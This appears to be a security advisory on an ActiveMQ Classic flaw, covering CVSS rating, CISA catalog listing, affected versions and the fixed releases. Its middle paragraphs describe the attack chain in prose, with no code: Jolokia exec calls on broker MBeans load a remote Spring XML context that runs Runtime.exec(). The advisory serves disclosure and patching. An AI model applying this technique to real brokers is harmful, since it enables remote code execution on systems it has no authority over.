Apache ActiveMQ ships with a Jolokia JMX-HTTP bridge whose default access policy lets an authenticated attacker turn a broker management call into arbitrary code execution on the JVM, and CISA added it to the Known Exploited Vulnerabilities catalog on 2026-04-16.
What Is It
An improper input validation and code injection flaw (CWE-20, CWE-94) in Apache ActiveMQ Classic. The web console exposes the Jolokia JMX-HTTP bridge at /api/jolokia/, and the default Jolokia access policy permits exec operations on all org.apache.activemq:* MBeans, including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String).
An authenticated attacker invokes those operations with a crafted discovery URI that drives the VM transport's brokerConfig parameter to load a remote Spring XML application context through ResourceXmlApplicationContext. Spring instantiates all singleton beans before BrokerService validates the configuration, so bean factory methods such as Runtime.exec() fire arbitrary code on the broker's JVM.
NVD rates it CVSS 3.1 8.8 HIGH (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), network-reachable, low complexity, low privileges, no user interaction, with high confidentiality, integrity, and availability impact.
Why It Matters
ActiveMQ brokers sit on internal message buses moving high-trust traffic between services, and authenticated abuse of a built-in management endpoint is exactly the kind of pivot that turns a stolen console credential into broker-host RCE. CISA added CVE-2026-34197 to the KEV catalog on 2026-04-16 with a federal remediation due date of 2026-04-30. Known ransomware campaign use is currently listed as Unknown.
What's Vulnerable
Apache ActiveMQ Broker, Apache ActiveMQ All, and Apache ActiveMQ:
- All versions before 5.19.4
- 6.x versions from 6.0.0 before 6.2.3
Affected CPEs include cpe:2.3:a:apache:activemq:* and cpe:2.3:a:apache:activemq_broker:* across both version ranges.
Patch Status
Apache has shipped fixes. Users should upgrade to 5.19.4 or 6.2.3. CISA's required action: apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.